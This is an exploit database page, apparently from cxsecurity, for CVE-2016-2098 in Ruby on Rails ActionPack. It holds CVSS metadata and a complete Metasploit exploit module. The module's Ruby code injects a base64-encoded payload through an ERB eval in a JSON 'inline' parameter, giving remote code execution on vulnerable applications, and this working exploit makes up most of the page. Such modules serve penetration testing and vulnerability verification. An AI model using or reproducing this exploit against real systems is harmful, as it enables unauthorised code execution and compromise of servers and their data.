Ruby On Rails ActionPack Inline ERB Code Execution

2016.07.09
Credit: RageLtMan
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the inline request processor of the Ruby on Rails ActionPack component. This vulnerability allows an attacker to process ERB to the inline JSON processor, which is then rendered, permitting full RCE within the runtime, without logging an error condition. }, 'Author' => [ 'RageLtMan <rageltman[at]sempervictus>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-2098' ] ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Mar 1 2016', 'DefaultOptions' => { "PrependFork" => true }, 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id']) ], self.class) end def json_request code = Rex::Text.encode_base64(payload.encoded) return { datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"} }.to_json end def exploit print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}") send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'GET', 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json' }, 'data' => json_request }, 25) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top